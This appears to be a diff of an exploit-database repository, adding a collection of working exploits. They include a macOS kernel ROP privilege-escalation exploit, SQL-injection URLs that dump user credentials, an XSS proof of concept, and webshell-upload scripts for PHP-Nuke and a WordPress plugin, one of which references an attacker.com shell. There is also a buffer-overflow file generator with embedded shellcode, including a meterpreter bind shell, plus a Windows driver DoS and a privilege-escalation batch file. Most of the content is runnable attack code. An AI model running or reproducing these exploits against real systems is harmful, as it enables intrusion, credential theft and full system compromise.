extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef);
uint64_t kext_load_addr(char* target_name){
uint64_t addr = 0;
CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
CFIndex count = CFDictionaryGetCount(kd);
void **keys;
void **values;
keys = (void **)malloc(sizeof(void *) * count);
values = (void **)malloc(sizeof(void *) * count);
CFDictionaryGetKeysAndValues(kd,
(const void **)keys,
(const void **)values);
for(CFIndex i = 0; i < count; i++){
const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
if (strcmp(name, target_name) == 0){
CFNumberGetValue(CFDictionaryGetValue(values[i],
CFSTR("OSBundleLoadAddress")),
kCFNumberSInt64Type,
&addr);
printf("%s: 0x%016llx\n", name, addr);
break;
}
}
return addr;
}
uint64_t load_addr(){
uint64_t addr = 0;
CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
CFIndex count = CFDictionaryGetCount(kd);
void **keys;
void **values;
keys = (void **)malloc(sizeof(void *) * count);
values = (void **)malloc(sizeof(void *) * count);
CFDictionaryGetKeysAndValues(kd,
(const void **)keys,
(const void **)values);
for(CFIndex i = 0; i < count; i++){
const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
if (strcmp(name, "com.apple.iokit.IONDRVSupport") == 0){
CFNumberGetValue(CFDictionaryGetValue(values[i],
CFSTR("OSBundleLoadAddress")),
kCFNumberSInt64Type,
&addr);
printf("%s: 0x%016llx\n", name, addr);
break;
}
}
return addr;
}
uint64_t* build_vtable(uint64_t kaslr_slide, size_t* len){
uint64_t kernel_base = 0xffffff8000200000;
kernel_base += kaslr_slide;
int fd = open("/mach_kernel", O_RDONLY);
if (!fd)
return NULL;
struct stat _stat;
fstat(fd, &_stat);
size_t buf_len = _stat.st_size;
uint8_t* buf = mmap(NULL, buf_len, PROT_READ, MAP_FILE|MAP_PRIVATE, fd, 0);
if (!buf)
return NULL;
/*
this stack pivot to rax seems to be reliably present across mavericks versions:
push rax
add [rax], eax
add [rbx+0x41], bl
pop rsp
pop r14
pop r15
pop rbp
ret
*/
uint8_t pivot_gadget_bytes[] = {0x50, 0x01, 0x00, 0x00, 0x5b, 0x41, 0x5c, 0x41, 0x5e};
uint8_t* pivot_loc = memmem(buf, buf_len, pivot_gadget_bytes, sizeof(pivot_gadget_bytes));
uint64_t pivot_gadget_offset = (uint64_t)(pivot_loc - buf);
printf("offset of pivot gadget: %p\n", pivot_gadget_offset);
uint64_t pivot = kernel_base + pivot_gadget_offset;
/*
pop rdi
ret
*/
uint8_t pop_rdi_ret_gadget_bytes[] = {0x5f, 0xc3};
uint8_t* pop_rdi_ret_loc = memmem(buf, buf_len, pop_rdi_ret_gadget_bytes, sizeof(pop_rdi_ret_gadget_bytes));
uint64_t pop_rdi_ret_gadget_offset = (uint64_t)(pop_rdi_ret_loc - buf);
printf("offset of pop_rdi_ret gadget: %p\n", pop_rdi_ret_gadget_offset);
uint64_t pop_rdi_ret = kernel_base + pop_rdi_ret_gadget_offset;
/*
pop rsi
ret
*/
uint8_t pop_rsi_ret_gadget_bytes[] = {0x5e, 0xc3};
uint8_t* pop_rsi_ret_loc = memmem(buf, buf_len, pop_rsi_ret_gadget_bytes, sizeof(pop_rsi_ret_gadget_bytes));
uint64_t pop_rsi_ret_gadget_offset = (uint64_t)(pop_rsi_ret_loc - buf);
printf("offset of pop_rsi_ret gadget: %p\n", pop_rsi_ret_gadget_offset);
uint64_t pop_rsi_ret = kernel_base + pop_rsi_ret_gadget_offset;
/*
pop rdx
ret
*/
uint8_t pop_rdx_ret_gadget_bytes[] = {0x5a, 0xc3};
uint8_t* pop_rdx_ret_loc = memmem(buf, buf_len, pop_rdx_ret_gadget_bytes, sizeof(pop_rdx_ret_gadget_bytes));
uint64_t pop_rdx_ret_gadget_offset = (uint64_t)(pop_rdx_ret_loc - buf);
printf("offset of pop_rdx_ret gadget: %p\n", pop_rdx_ret_gadget_offset);
uint64_t pop_rdx_ret = kernel_base + pop_rdx_ret_gadget_offset;
munmap(buf, buf_len);
close(fd);
/*
in IOAcceleratorFamily2
two locks are held - r12 survives the pivot, this should unlock all the locks from there:
__text:0000000000006F80 lea rsi, unk_32223
__text:0000000000006F87 mov rbx, [r12+118h]
__text:0000000000006F8F mov rax, [rbx]
__text:0000000000006F92 mov rdi, rbx
__text:0000000000006F95 xor edx, edx
__text:0000000000006F97 call qword ptr [rax+858h]
__text:0000000000006F9D mov rdi, rbx ; this
__text:0000000000006FA0 call __ZN22IOGraphicsAccelerator211unlock_busyEv ; IOGraphicsAccelerator2::unlock_busy(void)
__text:0000000000006FA5 mov rdi, [rbx+88h]
__text:0000000000006FAC call _IOLockUnlock
__text:0000000000006FB1
__text:0000000000006FB1 loc_6FB1: ; CODE XREF: IOAccelContext2::clientMemoryForType(uint,uint *,IOMemoryDescriptor **)+650j
__text:0000000000006FB1 xor ecx, ecx
__text:0000000000006FB3 jmp loc_68BC
...
__text:00000000000068BC mov eax, ecx ; jumptable 00000000000067F1 default case
__text:00000000000068BE add rsp, 38h
__text:00000000000068C2 pop rbx
__text:00000000000068C3 pop r12
__text:00000000000068C5 pop r13
__text:00000000000068C7 pop r14
__text:00000000000068C9 pop r15
__text:00000000000068CB pop rbp
__text:00000000000068CC retn
*/
uint64_t unlock_locks = kext_load_addr("com.apple.iokit.IOAcceleratorFamily2") + kaslr_slide + 0x6f80;
printf("0x%016llx\n", unlock_locks);
uint64_t KUNCExecute = kernel_symbol("_KUNCExecute") + kaslr_slide;
uint64_t thread_exception_return = kernel_symbol("_thread_exception_return") + kaslr_slide;
//char* payload = "/Applications/Calculator.app/Contents/MacOS/Calculator";
char* payload = "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal";
uint64_t rop_stack[] = {
0, //pop r14
0, //pop r15
0, //pop rbp +10
unlock_locks,
pivot, //+20 virtual call is rax+20
0, //+10
0, //+18
0,
0, //+28
0,
0, //+38
0, //pop rbx
0, //pop r12
0, //pop r13
0, //pop r14
0, //pop r15
0, //pop rbp
pop_rdi_ret,
(uint64_t)payload,
pop_rsi_ret,
0,
pop_rdx_ret,
0,
KUNCExecute,
thread_exception_return
};
uint64_t* r = malloc(sizeof(rop_stack));
memcpy(r, rop_stack, sizeof(rop_stack));
*len = sizeof(rop_stack);
return r;
}
void trigger(void* vtable, size_t vtable_len){
//need to overallocate and touch the pages since this will be the stack:
mach_vm_address_t addr = 0x41420000 - 10 * 0x1000;
mach_vm_allocate(mach_task_self(), &addr, 0x20*0x1000, 0);
memset(addr, 0, 0x20*0x1000);
memcpy((void*)0x41420000, vtable, vtable_len);
//map NULL page
vm_deallocate(mach_task_self(), 0x0, 0x1000);
addr = 0;
vm_allocate(mach_task_self(), &addr, 0x1000, 0);
char* np = 0;
for (int i = 0; i < 0x1000; i++){
np[i] = 'A';
}
volatile uint64_t* zero = 0;
*zero = 0x41420000;
//trigger vuln
CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
io_iterator_t iterator;
kern_return_t err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
io_service_t service = IOIteratorNext(iterator);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), 2, &conn);
addr = 0x12345000;
mach_vm_size_t size = 0x1000;
err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
}
int main() {
uint64_t leaked_ptr = leak();
uint64_t kext_load_addr = load_addr();
// get the offset of that pointer in the kext:
uint64_t offset = leaked_offset_in_kext();
// sanity check the leaked address against the symbol addr:
if ( (leaked_ptr & 0xfff) != (offset & 0xfff) ){
printf("the leaked pointer doesn't match up with the expected symbol offset\n");
return 1;
}
uint64_t kaslr_slide = (leaked_ptr - offset) - kext_load_addr;
printf("kaslr slide: %p\n", kaslr_slide);
size_t vtable_len = 0;
void* vtable = build_vtable(kaslr_slide, &vtable_len);
trigger(vtable, vtable_len);
return 0;
}

41
platforms/php/remote/35855.txt Executable file
View file

@ -0,0 +1,41 @@
source: http://www.securityfocus.com/bid/48259/info
PHP is prone to a security-bypass vulnerability.
Successful exploits will allow an attacker to create arbitrary files from the root directory, which may aid in further attacks.
PHP 5.3.6 is vulnerable; other versions may also be affected.
HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
content-length: 200
------------ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
Content-Type: text/plain
any
------------ThIs_Is_tHe_bouNdaRY_$--
HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html
/anything.here.slash-will-pass
PHP script:
=====
<?php
if (!empty($_FILES['contents'])) { // process file upload
echo $_FILES['contents']['name'];
unlink($_FILES['contents']['tmp_name']);
}

View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/48166/info
The GD Star Rating plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0x535242,1,1,co
ncat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0x20,2000)),1,2000),0x223b7d),1,1,1+limit+1

View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/48215/info
The Pacer Edition CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The Pacer Edition CMS RC 2.1 is vulnerable; prior versions may also be affected.
<html>
<title>Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script>
<form action="http://www.example.com/admin/login/forgot/index.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="url" value="1" />
<input type="hidden" name="email" value=&#039;%F6"+onmouseover=prompt(31337)&#039; />
<input type="hidden" name="button" value="Send%20Details" />
</form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit!<h3></center></font></b></a>
</body>
</html>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48217/info
Tolinet Agencia is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/index.php?tip=art&id=2' <- blind sql

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48223/info
Joomla Minitek FAQ Book is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Joomla Minitek FAQ Book 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--

62
platforms/php/webapps/35840.txt Executable file
View file

@ -0,0 +1,62 @@
???# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
# Date: 11-05-2014
# Exploit Author: shyamkumar somana
# Vendor Homepage: http://redaxscript.com/
# Version: 2.1.0
# Tested on: Windows 8
#Privilege Escalation in RedaxScript 2.1.0
RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The
issue occurs because the application fails to properly implement access
controls. The application also fails to perform proper sanity checks on the
user supplied input before processing it. These two flaws led to a
vertical privilege escalation. This can be achieved by a simply tampering
the parameter values. An attacker can exploit this issue to gain elevated
privileges to the application.
*Steps to reproduce the instance:*
· login as a non admin user
· Go to account and update the account.
· intercept the request and add “*groups[]=1*” to the post data and
submit the request
· Log out of the application and log in again. You can now browse
the application with admin privileges.
This vulnerability was addressed in the following commit.
https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified
*Timeline*:
09-26-2014: Issue identified
09-27-2014: Discussion with the vendor
10-27-2014: Issue confirmed
11-05-2014: Patch released.
Author: Shyamkumar Somana
Vendor Homepage: http://redaxscript.com/download
Version: 2.1.0
Tested on: Windows 7
--
[image: --]
shyam kumar
[image: http://]about.me/shyamkumar.somana
<http://about.me/shyamkumar.somana?promo=email_sig>
Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam |
in.linkedin.com/in/sshyamkumar/ |

118
platforms/php/webapps/35846.txt Executable file
View file

@ -0,0 +1,118 @@
Mogwai Security Advisory MSA-2015-01
----------------------------------------------------------------------
Title: WP Pixarbay Images Multiple Vulnerabilities
Product: Pixarbay Images (Wordpress Plugin)
Affected versions: 2.3
Impact: high
Remote: yes
Product link: https://wordpress.org/plugins/pixabay-images/
Reported: 14/01/2015
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
----------------------------------------------------------------------
Pixabay Images is a WordPress plugin that let's you pick CC0 public
domain pictures from Pixabay and insert them with just a click anywhere
on your blog. The images are safe to use, and paying attribution or
linking back to the source is not required.
Business recommendation:
----------------------------------------------------------------------
Update to version 2.4
Vulnerability description:
----------------------------------------------------------------------
1) Authentication bypass
The plugin does not correctly check if the user is logged in. Certain
code can be called without authentication
2) Arbitrary file upload
The plugin code does not validate the host in the provided download URL,
which allows to upload malicious files, including PHP code.
3) Path Traversal
Certain values are not sanitized before they are used in a file operation.
This allows to store files outside of the "download" folder.
4) Cross Site Scripting (XSS)
The generated author link uses unsanitized user values which can be
abused for Cross Site Scripting (XSS) attacks.
Proof of concept:
----------------------------------------------------------------------
The following PoC Python script can be used to download PHP files from
a attacker controlled host.
#!/usr/bin/env python
import argparse
import httplib, urllib
from urlparse import urlparse
def exploit(target_url, shellcode_url):
target = urlparse(target_url)
params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url,
'image_user': 'none', 'q':'xxx/../../../../../../mogwai'})
headers = headers = {"Content-type": "application/x-www-form-urlencoded"}
print "[+] Sending download request...."
conn = httplib.HTTPConnection(target.netloc)
conn.request("POST", target.path + "/wp-admin/", params, headers)
response = conn.getresponse()
response_data = response.read()
if response.status != 200 and response_data != "Error: File attachment metadata
error":
print "[-] Something went wrong"
print response_data
exit()
conn.close()
# ---- Main code ----------------
parser = argparse.ArgumentParser()
parser.add_argument("target_url", help="The target url, for example
http://foo.bar/blog/")
parser.add_argument("shellcode_url", help="The url of the PHP file that should
be uploaded, for example: http://attacker.com/shell.php")
print "----------------------------------------------"
print " pixabay upload wordpress plugin exploit PoC"
print " Mogwai security"
print "----------------------------------------------"
arguments = parser.parse_args()
exploit(arguments.target_url, arguments.shellcode_url)
Vulnerable / tested versions:
----------------------------------------------------------------------
Pixabay Images 2.3
Disclosure timeline:
----------------------------------------------------------------------
14/01/2014: Reporting issues to the plugin author
15/01/2014: Release of fixed version (2.4)
19/01/2014: Public advisory
Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab
----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info@mogwaisecurity.de

12
platforms/php/webapps/35851.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/48233/info
WebFileExplorer is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WebFileExplorer 3.6 is vulnerable; other versions may also be affected.
Supplying the following input to the username or password field is sufficient to exploit these issues:
user: admin' or '1=1
pass: anything

57
platforms/php/webapps/35853.php Executable file
View file

@ -0,0 +1,57 @@
source: http://www.securityfocus.com/bid/48257/info
Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
Phpnuke 8.3 is vulnerable; other versions may also be affected.
<?php
///////////////////////////////////////////////////
#Iranian Pentesters Home
#PHP Nuke 8.3 MT AFU Vulnerability
#Coded by:4n0nym0us & b3hz4d
#http://www.pentesters.ir
///////////////////////////////////////////////////
//Settings:
$address = 'http://your-target.com';
$file = 'shell.php.01';
$prefix='pentesters_';
//Exploit:
@$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00";
@$file_data .= file_get_contents($file);
file_put_contents($prefix . $file, $file_data);
$file = $prefix . $file;
echo "\n" . "///////////////////////////////////" ."\n";
echo " Iranian Pentesters Home" . "\n";
echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n";
echo "///////////////////////////////////" ."\n";
$address_c = $address . '/includes/richedit/upload.php';
$postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1");
$data = post_data($address_c, $postdata);
$start = strpos($data, "<img src=\"upload");
if ($start != null)
{
$data = substr($data,$start + 10);
$end = strpos($data, "\"");
$data = substr($data,0,$end);
echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n";
}
else
echo "\n" . "Upload Failed!!!";
function post_data($address, $data)
{
$curl = curl_init($address);
curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)");
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
$content = curl_exec($curl);
curl_close($curl);
return $content;
}
?>

49
platforms/php/webapps/35854.pl Executable file
View file

@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/48257/info
Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
Phpnuke 8.3 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###################################################
#//Iranian Pentesters Home
#//PHP Nuke 8.3 MT AFU Vulnerability
#//Coded by:4n0nym0us & b3hz4d
#//http://www.pentesters.ir
###################################################
use LWP;
use HTTP::Request::Common;
print "\n" . "///////////////////////////////////" ."\n";
print " Iranian Pentesters Home" . "\n";
print " PHP Nuke 8.3 MT AFU Vulnerability" . "\n";
print "///////////////////////////////////" ."\n";
print "\n" . "Syntax: perl xpl.pl http://your-target.com shell.php.01 [prefix]" . "\n\n";
my $url = $ARGV[0]."/includes/richedit/upload.php";
my $filename = $ARGV[1];
my $prefix = $ARGV[2];
my $rfile = $prefix . $filename . ".gif";
open fhandle, $ARGV[1] or die $!;
while (<fhandle>){
$shell .= $_;
}
close fhandle;
open fhandle, ">", $rfile or die $!;
print fhandle "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"."\n".$shell;
close(fhandle);
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026");
my $req = POST $url, Content_Type => 'form-data',
Content => [
upload => "1",
path => 'images',
pwd => "1",
userfile => [ $rfile,$prefix . $filename ]
];
my $res = $ua->request($req);
$between=substr($res->as_string(), index($res->as_string(), '<img src="upload/')+10, index($res->as_string(), 'onclick="self.parent.') - index($res->as_string(), '<img src="upload/')-12);
print("Uploaded File: " . $ARGV[0]."/includes/richedit/".$between);
exit;

71
platforms/windows/dos/35842.c Executable file
View file

@ -0,0 +1,71 @@
/*
Exploit Title - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
Date - 19th January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.malwarebytes.org
Tested Version - 1.03.1.1220, 1.04.1.1012
Driver Version - no version set - mbae.sys
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB - http://www.osvdb.org/show/osvdb/114249
CVE ID - CVE-2014-100039
Vendor fix url - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
Fixed version - 1.05
Fixed driver ver - no version set
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 25
int main(int argc, char *argv[])
{
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
BYTE sizebytes[4] = "\xff\xff\xff\x00";
BYTE *inbuffer;
printf("-------------------------------------------------------------------------------\n");
printf(" MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS \n");
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");
inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memset(inbuffer, 0x41, BUFSIZE);
memcpy(inbuffer, sizebytes, sizeof(sizebytes));
printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to DoS . . .");
getch();
DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
printf("\n[+] DoS buffer sent\n\n");
CloseHandle(hDevice);
return 0;
}

135
platforms/windows/local/35821.txt Executable file
View file

@ -0,0 +1,135 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define SIZE 65536
/*
* Title: Sim Editor v6.6 Stack Based Buffer Overflow
* Version: 6.6
* Tested on: Windows XP sp2 en, Windows 8 64-bit
* Date: 16-01-2015
* Author: Osanda Malith Jayathissa
* E-Mail: osanda[cat]unseen.is
* Website: OsandaMalith.wordpress.com
* CVE: CVE-2015-1171
*/
const char shell1[] = "ba516a43ddd9e9d97424f45e33c9b1"
"3231561503561583eefce2a496ab54"
"46672c07cf821d15abc70ca9b88abc"
"42ec3e36263830ff8d1e7f00209ed3"
"c222622e17855be16ac49c1c849475"
"6a3709f22e8428d424b45251fa41e9"
"582bf96612d3712082e25632feadd3"
"81752c32d8761e7ab749ae77c98e09"
"68bce46915c73f13c142ddb382f505"
"454663ce4923e7884db224a36a3fcb"
"63fb7be8a7a7d891fe0d8eaee0ea6f"
"0b6b187b2d36777abf4d3e7cbf4d11"
"158ec6fe620f0dbb9d450fea3500da"
"ae5bb331ec6530b38d9128b688deee"
"2be14f9b4b566f8e262bff50d1a58b"
"92";
/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */
const char shell2[] = "bb3ff8edc8dbc6d97424f45f2bc9b1"
"4a83effc315f11035f11e2ca04054e"
"34f5d62fbd10e77dd9515ab2aa3457"
"39feacec4fd6c345e500ed56cb8ca1"
"954d70b8c9ad49731caf8e6eeffd47"
"e44212ecb85e99be2ce77e744cc6d0"
"0317c8d3c02341cc050f1b67fdfb9a"
"a1cc04ad8d823a0100db7ba6fbae77"
"d486a843a65c3d560016e5b2b0fb73"
"30beb0f01ea347d514dfccd8fa6996"
"fede324c9f479f23a098479b04d26a"
"c831b9e23d7342f3290431c1f6bedd"
"697e18198d55dcb570561c9fb6024c"
"b71f2b07479ffe87170f5167c8ef01"
"0f02e07e2f2d2a179e098670e2ad38"
"dd6b4b50cd3dc3cd2f1adc6a4f4970"
"22c7c69ef4e8d7b45644705f2d8645"
"7e3283ee17a5597e55575dab0f97cb"
"5786c06355ff272ca62a3ce532952b"
"0ad215ac5cb815c4389845f14635fa"
"aad2b5ab1f74dd5179b242a9ac42bf"
"7c89c0c90af908";
const char *shells[] = { shell1, shell2 };
const char *shell_names[] = { "MS Paint", "Bind Shell" };
const char *shell_info[] = { "", "[*] Connect on port 4444\n" };
const size_t SHELLS_COUNT = 2;
int menu() {
size_t shell_type = SHELLS_COUNT;
puts("\b[?] Choose an Option: ");
size_t i;
for (i = 0; i < SHELLS_COUNT; i++) printf("%d. %s\n", i, shell_names[i]);
scanf("%i", &shell_type);
return shell_type;
}
void banner() {
static const char banner[] =
" _____ _ _____ _ _ _ \n"
"| __|_|_____ | __|_| |_| |_ ___ ___ \n"
"|__ | | | | __| . | | _| . | _|\n"
"|_____|_|_|_|_| |_____|___|_|_| |___|_|\n"
"\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n"
"[~] Author: Osanda Malith Jayathissa\n"
"[~] E-Mail: osanda[cat]unseen.is\n"
"[~] Website: OsandaMalith.wordpress.com\n\n";
fwrite(banner, sizeof(char), sizeof(banner) , stdout);
}
void patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {
size_t pattern_len = strlen(pattern);
count *= pattern_len;
if (count > dst_size) count = dst_size;
if (pattern_len > dst_size) pattern_len = dst_size;
size_t i, pI;
for (i = 0, pI = 0; i < count ; i++, pI++) {
if (pI == pattern_len) pI = 0;
dst[i] = pattern[pI];
}
}
int main() {
banner();
int shell_type = menu();
if (shell_type >= SHELLS_COUNT) {
printf("[-] Enter a valid input\n");
exit (1);
}
char *buff = (char*) calloc (SIZE, sizeof(char));
char *nops = (char*) calloc (SIZE, sizeof(char));
if (!buff || !nops) exit (1);
patternfill(buff, "41", 405, SIZE);
patternfill(nops, "90", 16, SIZE);
char ret[] = "B3804200";
const char* filename = "exploit.sms";
FILE *outfile = fopen(filename, "w");
if (!outfile) {
printf("%s\n","Could not open file");
exit (1);
}
fputs(buff, outfile);
fputs(ret, outfile);
fputs(nops, outfile);
fputs(shells[shell_type], outfile);
printf("%s", shell_info[shell_type]);
fclose(outfile);
free(buff);
printf("[+] Successfully to written to: \"%s\"\n", filename);
return 0;
}
/*EOF*/

View file

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/48232/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.
@echo off
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
time 13:36:59 > nul
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
echo [*] Backup time
time < time.txt

View file

@ -0,0 +1,31 @@
# Exploit Title: Bsplayer HTTP Response BOF
# Date: Jan 17 ,2015
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Vendor Homepage: www.bsplayer.com
# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
# Version: current (2.68).
# Tested on: Windows 7 sp1 x86 version.
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r
Exploit: http://www.exploit-db.com/sploits/35841.tar.gz
Bsplayer suffers from a buffer overflow vulnerability when processing the
HTTP response when opening a URL. In order to exploit this bug I needed to
load a dll with no null addresses and no safeseh ,ASLR or DEP. I noticed
that one of the dlls that matches this criteria is (MSVCR71.dll) and it's
loaded when I loaded an flv file over the network and that's why I'm
sending a legitimate flv file first so later we can use the loaded dll.
Also the space after the seh record is pretty small so what I did is that I
added a small stage shell cdoe to add offset to esp so it points at the
beginning of my buffer and then a jmp esp instruction to execute the actual
shellcode.
--
*Regards,*
Fady Osman
about.me/Fady_Osman
<http://about.me/Fady_Osman>